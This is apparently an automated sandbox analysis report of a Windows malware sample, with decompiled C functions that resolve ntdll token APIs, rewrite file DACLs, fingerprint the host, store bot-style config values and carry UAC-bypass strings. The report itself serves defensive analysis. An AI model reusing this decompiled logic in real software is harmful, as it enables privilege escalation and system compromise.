Addresses: 0x00401000, 0x00401006, 0x0040100b, 0x00401023, 0x0040102a, 0x004010c2, 0x004010c4, 0x004010cb, 0x0040127b, 0x0040127b, 0x004010d1, 0x004010dc, 0x004010e1, 0x004010e3, 0x004010ea, 0x00000000, 0x004010f0, 0x004010fc, 0x00401101, 0x00401103, 0x0040110a, 0x00000000, 0x00401110, 0x0040111c, 0x00401121, 0x00401123, 0x0040112a, 0x00000000, 0x00401130, 0x0040113b
                                                                                0x00401140
                                                                                0x00401142
                                                                                0x00401149
                                                                                0x00000000
                                                                                0x0040114f
                                                                                0x0040115b
                                                                                0x00401160
                                                                                0x00401162
                                                                                0x00401169
                                                                                0x00000000
                                                                                0x0040116f
                                                                                0x0040117b
                                                                                0x00401180
                                                                                0x00401182
                                                                                0x00401189
                                                                                0x00000000
                                                                                0x0040118f
                                                                                0x0040119a
                                                                                0x0040119f
                                                                                0x004011a1
                                                                                0x004011a8
                                                                                0x00000000
                                                                                0x004011ae
                                                                                0x004011ba
                                                                                0x004011bf
                                                                                0x004011c1
                                                                                0x004011c8
                                                                                0x00000000
                                                                                0x004011ce
                                                                                0x004011da
                                                                                0x004011df
                                                                                0x004011e1
                                                                                0x004011e8
                                                                                0x00000000
                                                                                0x004011ee
                                                                                0x004011f9
                                                                                0x004011fe
                                                                                0x00401200
                                                                                0x00401207
                                                                                0x00000000
                                                                                0x00401209
                                                                                0x00401215
                                                                                0x0040121a
                                                                                0x0040121c
                                                                                0x00401223
                                                                                0x00000000
                                                                                0x00401225
                                                                                0x00401231
                                                                                0x00401236
                                                                                0x00401238
                                                                                0x0040123f
                                                                                0x00000000
                                                                                0x00401241
                                                                                0x0040124c
                                                                                0x00401251
                                                                                0x00401253
                                                                                0x0040125a
                                                                                0x00000000
                                                                                0x0040125c
                                                                                0x00401268
                                                                                0x0040126d
                                                                                0x0040126f
                                                                                0x00401276
                                                                                0x00401276
                                                                                0x00401279
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401279
                                                                                0x0040125a
                                                                                0x0040123f
                                                                                0x00401223
                                                                                0x00401207
                                                                                0x004011e8
                                                                                0x004011c8
                                                                                0x004011a8
                                                                                0x00401189
                                                                                0x00401169
                                                                                0x00401149
                                                                                0x0040112a
                                                                                0x0040110a
                                                                                0x004010ea
                                                                                0x0040127f
                                                                                0x004010ae
                                                                                0x004010b4
                                                                                0x004010b4
                                                                                0x0040100d
                                                                                0x00401012
                                                                                0x00401018
                                                                                0x0040101f
                                                                                0x00000000
                                                                                0x00401022
                                                                                0x00401022
                                                                                0x00401022
                                                                                0x0040101f

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                • GetProcAddress.KERNEL32(?,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 004010E1
                                                                                • GetProcAddress.KERNEL32(?,NtTerminateProcess), ref: 00401101
                                                                                • GetProcAddress.KERNEL32(?,RtlFreeSid), ref: 00401121
                                                                                • GetProcAddress.KERNEL32(?,RtlInitUnicodeString), ref: 00401140
                                                                                • GetProcAddress.KERNEL32(?,NtSetInformationThread), ref: 00401160
                                                                                • GetProcAddress.KERNEL32(?,NtSetInformationToken), ref: 00401180
                                                                                • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040119F
                                                                                • GetProcAddress.KERNEL32(?,NtClose), ref: 004011BF
                                                                                • GetProcAddress.KERNEL32(?,NtOpenProcessToken), ref: 004011DF
                                                                                • GetProcAddress.KERNEL32(?,NtDuplicateToken), ref: 004011FE
                                                                                • GetProcAddress.KERNEL32(?,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                • API String ID: 2238633743-3228201535
                                                                                • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
                                                                                				struct _FILETIME _v12;
                                                                                				struct _SYSTEMTIME _v28;
                                                                                				CHAR* _v32;
                                                                                				CHAR* _v36;
                                                                                				CHAR* _v40;
                                                                                				CHAR* _v44;
                                                                                				CHAR* _v48;
                                                                                				CHAR* _v52;
                                                                                				CHAR* _v56;
                                                                                				CHAR* _v60;
                                                                                				CHAR* _v64;
                                                                                				CHAR* _v68;
                                                                                				CHAR* _v72;
                                                                                				CHAR* _v76;
                                                                                				CHAR* _v80;
                                                                                				CHAR* _v84;
                                                                                				CHAR* _v88;
                                                                                				CHAR* _v92;
                                                                                				CHAR* _v96;
                                                                                				CHAR* _v100;
                                                                                				CHAR* _v104;
                                                                                				struct _TIME_ZONE_INFORMATION _v276;
                                                                                				long _t77;
                                                                                				signed int _t80;
                                                                                				signed int _t93;
                                                                                				signed int _t101;
                                                                                				signed int _t102;
                                                                                				CHAR* _t103;
                                                                                				signed int _t104;
                                                                                				signed short _t106;
                                                                                				signed short _t109;
                                                                                				signed int _t114;
                                                                                				signed int _t115;
                                                                                				void* _t117;
                                                                                
                                                                                				_v56 = "Sun";
                                                                                				_v52 = "Mon";
                                                                                				_v48 = "Tue";
                                                                                				_v44 = "Wed";
                                                                                				_v40 = "Thu";
                                                                                				_v36 = "Fri";
                                                                                				_v32 = "Sat";
                                                                                				_v104 = "Jan";
                                                                                				_v100 = "Feb";
                                                                                				_v96 = "Mar";
                                                                                				_v92 = "Apr";
                                                                                				_v88 = "May";
                                                                                				_v84 = "Jun";
                                                                                				_v80 = "Jul";
                                                                                				_v76 = "Aug";
                                                                                				_v72 = "Sep";
                                                                                				_v68 = "Oct";
                                                                                				_v64 = "Nov";
                                                                                				_v60 = "Dec";
                                                                                				if(_a4 != 0) {
                                                                                					FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                				} else {
                                                                                					GetLocalTime( &_v28);
                                                                                				}
                                                                                				_t114 = _a12;
                                                                                				if(_t114 != 0) {
                                                                                					SystemTimeToFileTime( &_v28,  &_v12);
                                                                                					_t93 = E0040ECA5();
                                                                                					if(_t114 <= 0) {
                                                                                						_t104 = _t93 %  ~_t114 * 0x23c34600;
                                                                                						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
                                                                                						asm("sbb [ebp-0x4], ebx");
                                                                                					} else {
                                                                                						_t104 = _t93 % _t114 * 0x23c34600;
                                                                                						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
                                                                                						asm("adc [ebp-0x4], ebx");
                                                                                					}
                                                                                					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                				}
                                                                                				_v276.Bias = 0;
                                                                                				_t77 = GetTimeZoneInformation( &_v276);
                                                                                				_t101 = _v276.Bias;
                                                                                				if(_t77 == 2) {
                                                                                					_t101 = _t101 + _v276.DaylightBias;
                                                                                				}
                                                                                				_t102 =  ~_t101;
                                                                                				asm("cdq");
                                                                                				_t80 = (_t102 ^ _t104) - _t104;
                                                                                				if(_v28.wDayOfWeek > 6) {
                                                                                					_t109 = 6;
                                                                                					_v28.wDayOfWeek = _t109;
                                                                                				}
                                                                                				if(_v28.wMonth == 0) {
                                                                                					_v28.wMonth = 1;
                                                                                				}
                                                                                				if(_v28.wMonth > 0xc) {
                                                                                					_t106 = 0xc;
                                                                                					_v28.wMonth = _t106;
                                                                                				}
                                                                                				_t103 = "+";
                                                                                				if(_t102 < 0) {
                                                                                					_t103 = "-";
                                                                                				}
                                                                                				_t115 = 0x3c;
                                                                                				asm("cdq");
                                                                                				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
                                                                                			}
                                                                                0x0040b225
                                                                                0x0040b22c
                                                                                0x0040b233
                                                                                0x0040b23a
                                                                                0x0040b241
                                                                                0x0040b248
                                                                                0x0040b24f
                                                                                0x0040b256
                                                                                0x0040b25d
                                                                                0x0040b264
                                                                                0x0040b26b
                                                                                0x0040b272
                                                                                0x0040b279
                                                                                0x0040b280
                                                                                0x0040b287
                                                                                0x0040b28e
                                                                                0x0040b295
                                                                                0x0040b29c
                                                                                0x0040b2a3
                                                                                0x0040b2ad
                                                                                0x0040b2c2
                                                                                0x0040b2d0
                                                                                0x0040b2af
                                                                                0x0040b2b3
                                                                                0x0040b2b3
                                                                                0x0040b2d2
                                                                                0x0040b2d7
                                                                                0x0040b2e1
                                                                                0x0040b2e7
                                                                                0x0040b2f0
                                                                                0x0040b306
                                                                                0x0040b30c
                                                                                0x0040b30f
                                                                                0x0040b2f2
                                                                                0x0040b2f4
                                                                                0x0040b2fa
                                                                                0x0040b2fd
                                                                                0x0040b2fd
                                                                                0x0040b31a
                                                                                0x0040b31a
                                                                                0x0040b323
                                                                                0x0040b329
                                                                                0x0040b32f
                                                                                0x0040b338

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                • wsprintfA.USER32 ref: 0040B3B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                • API String ID: 766114626-2976066047
                                                                                • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E00407809(CHAR* _a4, signed int _a8) {
                                                                                				signed int _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				struct _ACL* _v20;
                                                                                				signed int _v24;
                                                                                				int _v28;
                                                                                				long _v32;
                                                                                				long _v36;
                                                                                				long _v40;
                                                                                				long _v44;
                                                                                				int _v48;
                                                                                				int _v52;
                                                                                				union _SID_NAME_USE _v56;
                                                                                				int _v60;
                                                                                				void _v128;
                                                                                				char _v384;
                                                                                				char _v512;
                                                                                				struct _SECURITY_DESCRIPTOR _v1536;
                                                                                				struct _ACL* _t110;
                                                                                				int _t120;
                                                                                				intOrPtr _t121;
                                                                                				signed int _t123;
                                                                                				signed int _t141;
                                                                                				char* _t146;
                                                                                				signed int _t153;
                                                                                				void* _t154;
                                                                                				void* _t155;
                                                                                				void* _t156;
                                                                                
                                                                                				_t141 = 0;
                                                                                				_v28 = 0;
                                                                                				_v20 = 0;
                                                                                				_v36 = 0x80;
                                                                                				if(GetUserNameA( &_v384,  &_v36) == 0) {
                                                                                					L42:
                                                                                					return _v28;
                                                                                				}
                                                                                				_v32 = 0x44;
                                                                                				_v40 = 0x80;
                                                                                				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
                                                                                					goto L42;
                                                                                				}
                                                                                				_v32 = GetLengthSid( &_v128);
                                                                                				_v44 = 0x400;
                                                                                				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
                                                                                					goto L42;
                                                                                				} else {
                                                                                					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
                                                                                						_v36 = 0x80;
                                                                                						_v40 = 0x80;
                                                                                						if(EqualSid( &_v128, _v16) == 0) {
                                                                                							_v28 = 1;
                                                                                							_t155 = LocalAlloc(0x40, 0x14);
                                                                                							if(_t155 != 0) {
                                                                                								LocalFree(_t155);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_v24 = _t141;
                                                                                					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
                                                                                						L41:
                                                                                						goto L42;
                                                                                					}
                                                                                					_t110 = _v20;
                                                                                					if(_t110 == _t141) {
                                                                                						goto L41;
                                                                                					}
                                                                                					_v8 = _v8 & _t141;
                                                                                					if(0 >= _t110->AceCount) {
                                                                                						goto L41;
                                                                                					} else {
                                                                                						goto L13;
                                                                                					}
                                                                                					do {
                                                                                						L13:
                                                                                						if(GetAce(_t110, _v8,  &_v12) == 0) {
                                                                                							L32:
                                                                                							_v8 = _v8 + 1;
                                                                                							goto L33;
                                                                                						}
                                                                                						_t153 = 0;
                                                                                						_v16 = _v12 + 8;
                                                                                						if(_t141 <= 0) {
                                                                                							L19:
                                                                                							if(_t141 < 0x20) {
                                                                                								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
                                                                                								_t141 = _t141 + 1;
                                                                                							}
                                                                                							_t120 = EqualSid( &_v128, _v16);
                                                                                							_t146 = _v12;
                                                                                							if(_t120 == 0) {
                                                                                								_t121 = 0x1200a8;
                                                                                							} else {
                                                                                								asm("sbb eax, eax");
                                                                                								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
                                                                                							}
                                                                                							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
                                                                                								 *((intOrPtr*)(_t146 + 4)) = _t121;
                                                                                								_t146 = _v12;
                                                                                								_v24 = 1;
                                                                                							}
                                                                                							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
                                                                                								 *_t146 = 0;
                                                                                								_t66 = _v16 + 8; // 0xc8685f74
                                                                                								_t123 =  *_t66;
                                                                                								if(_t123 != 0) {
                                                                                									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
                                                                                								} else {
                                                                                									 *((char*)(_v12 + 1)) = 0xb;
                                                                                								}
                                                                                								_v24 = 1;
                                                                                							}
                                                                                							goto L32;
                                                                                						}
                                                                                						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
                                                                                							_t153 = _t153 + 1;
                                                                                							if(_t153 < _t141) {
                                                                                								continue;
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						if(_t153 >= _t141) {
                                                                                							goto L19;
                                                                                						}
                                                                                						DeleteAce(_v20, _v8);
                                                                                						_v24 = 1;
                                                                                						L33:
                                                                                						_t110 = _v20;
                                                                                					} while (_v8 < (_t110->AceCount & 0x0000ffff));
                                                                                					if(_v24 != 0) {
                                                                                						_v28 = 1;
                                                                                						_t154 = LocalAlloc(0x40, 0x14);
                                                                                						if(_t154 != 0) {
                                                                                							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
                                                                                								_v28 = 1;
                                                                                							}
                                                                                							LocalFree(_t154);
                                                                                						}
                                                                                					}
                                                                                					goto L41;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 0040782F
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00407878
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407917
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00407963
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
                                                                                • DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                • API String ID: 1628651668-1839596206
                                                                                • Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                • Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E00401D96(void* __ecx, intOrPtr* _a4) {
                                                                                				struct _OSVERSIONINFOA _v156;
                                                                                				struct _SYSTEM_INFO _v192;
                                                                                				char _v196;
                                                                                				intOrPtr _v200;
                                                                                				intOrPtr _t59;
                                                                                				signed int _t61;
                                                                                				signed int _t63;
                                                                                				void* _t65;
                                                                                				intOrPtr _t66;
                                                                                				intOrPtr _t67;
                                                                                				signed int _t71;
                                                                                				intOrPtr _t93;
                                                                                				intOrPtr _t96;
                                                                                				intOrPtr _t97;
                                                                                				intOrPtr _t102;
                                                                                				intOrPtr* _t103;
                                                                                				intOrPtr* _t105;
                                                                                				void* _t109;
                                                                                				void* _t110;
                                                                                				void* _t111;
                                                                                				void* _t112;
                                                                                				void* _t113;
                                                                                				void* _t114;
                                                                                
                                                                                				_t105 = _a4;
                                                                                				_t102 = 0x64;
                                                                                				E0040EE2A(__ecx, _t105, 0, _t102);
                                                                                				_t109 =  &_v200 + 0xc;
                                                                                				 *_t105 = _t102;
                                                                                				_v156.dwOSVersionInfoSize = 0x9c;
                                                                                				if(GetVersionExA( &_v156) == 0) {
                                                                                					 *((char*)(_t105 + 0x41)) = 0;
                                                                                				} else {
                                                                                					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
                                                                                				}
                                                                                				GetSystemInfo( &_v192);
                                                                                				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
                                                                                				_v196 = 0;
                                                                                				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                                                                				if(_t103 != 0) {
                                                                                					 *_t103(GetCurrentProcess(),  &_v196);
                                                                                				}
                                                                                				_t104 = "localcfg";
                                                                                				 *((char*)(_t105 + 0x40)) = 2;
                                                                                				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
                                                                                				_t92 = "flags_upd";
                                                                                				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
                                                                                				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
                                                                                				_t61 =  *(_t105 + 4);
                                                                                				_t110 = _t109 + 0x20;
                                                                                				if((_t61 & 0x00000008) != 0) {
                                                                                					 *(_t105 + 4) = _t61 & 0xfffffff7;
                                                                                					E0040DF70(1, "work_srv");
                                                                                					E0040DF70(1, "start_srv");
                                                                                					_t110 = _t110 + 0x10;
                                                                                				}
                                                                                				E0040EA84(1, _t104, _t92, 0);
                                                                                				_t93 = 0;
                                                                                				_t63 = E0040E819(1, _t104, "net_type", 0);
                                                                                				_t111 = _t110 + 0x20;
                                                                                				 *(_t105 + 0x14) = _t63;
                                                                                				if(E0040199C(_t63) == 0) {
                                                                                					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
                                                                                				} else {
                                                                                					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
                                                                                				}
                                                                                				_t65 = E0040E819(1, _t104, "born_date", _t93);
                                                                                				_t112 = _t111 + 0x10;
                                                                                				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
                                                                                				if(_t65 == _t93) {
                                                                                					_t97 = E0040F04E(_t93);
                                                                                					E0040EA84(1, _t104, "born_date", _t97);
                                                                                					_t112 = _t112 + 0x14;
                                                                                					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
                                                                                					_t93 = 0;
                                                                                				}
                                                                                				_t94 = "id";
                                                                                				_t66 = E0040E819(1, _t104, "id", _t93);
                                                                                				_t113 = _t112 + 0x10;
                                                                                				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
                                                                                				if(_t66 == 0) {
                                                                                					_v200 = E00401B71();
                                                                                					E0040EA84(1, _t104, _t94, _t77);
                                                                                					_t113 = _t113 + 0x10;
                                                                                					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
                                                                                				}
                                                                                				_t95 = "hi_id";
                                                                                				_t67 = E0040E819(1, _t104, "hi_id", 0);
                                                                                				_t114 = _t113 + 0x10;
                                                                                				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
                                                                                				if(_t67 == 0) {
                                                                                					_v200 = E00401BDF();
                                                                                					E0040EA84(1, _t104, _t95, _t74);
                                                                                					_t114 = _t114 + 0x10;
                                                                                					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t105 + 8)) = 0x61;
                                                                                				_t96 = E0040E819(1, _t104, "loader_id", 0);
                                                                                				if(_t96 == 0) {
                                                                                					_t96 = 4;
                                                                                					E0040EA84(1, _t104, "loader_id", _t96);
                                                                                				}
                                                                                				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
                                                                                				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
                                                                                				if( *0x41201d == 0) {
                                                                                					if( *0x41201f == 0) {
                                                                                						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
                                                                                					} else {
                                                                                						if(E00406EC3() != 0) {
                                                                                							 *(_t105 + 0x18) = 2;
                                                                                						} else {
                                                                                							 *(_t105 + 0x18) = 0x10;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					 *(_t105 + 0x18) = 1;
                                                                                				}
                                                                                				if(_v196 != 0) {
                                                                                					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
                                                                                				}
                                                                                				_t71 = GetTickCount() / 0x3e8;
                                                                                				 *0x412110 = _t71;
                                                                                				 *(_t105 + 0x28) = _t71;
                                                                                				return _t71;
                                                                                			}

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                  • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                • API String ID: 4207808166-1381319158
                                                                                • Opcode ID: 174b5597e53b85571f1c32fd197fd8fbccf035cef4f3f42155ce14a49909b689
                                                                                • Instruction ID: 4bec38004d2b42250697577447cb56bf839fa837f468b717733c20bdb0386e2e
                                                                                • Opcode Fuzzy Hash: 174b5597e53b85571f1c32fd197fd8fbccf035cef4f3f42155ce14a49909b689
                                                                                • Instruction Fuzzy Hash: A151FAB05003446FD330AF768C85F67BAECEB84708F04493FF955A2292D7BDA94487A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E00402A62(void* __ecx, intOrPtr* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr* _v44;
                                                                                				signed short _v272;
                                                                                				char _v276;
                                                                                				long _v280;
                                                                                				char _v284;
                                                                                				signed short _v288;
                                                                                				signed short _v292;
                                                                                				long _v300;
                                                                                				long _v304;
                                                                                				intOrPtr _v308;
                                                                                				signed short _v324;
                                                                                				intOrPtr _v332;
                                                                                				signed short _v336;
                                                                                				signed int _v340;
                                                                                				signed int _v344;
                                                                                				void* _v348;
                                                                                				signed short _v352;
                                                                                				signed short _v356;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
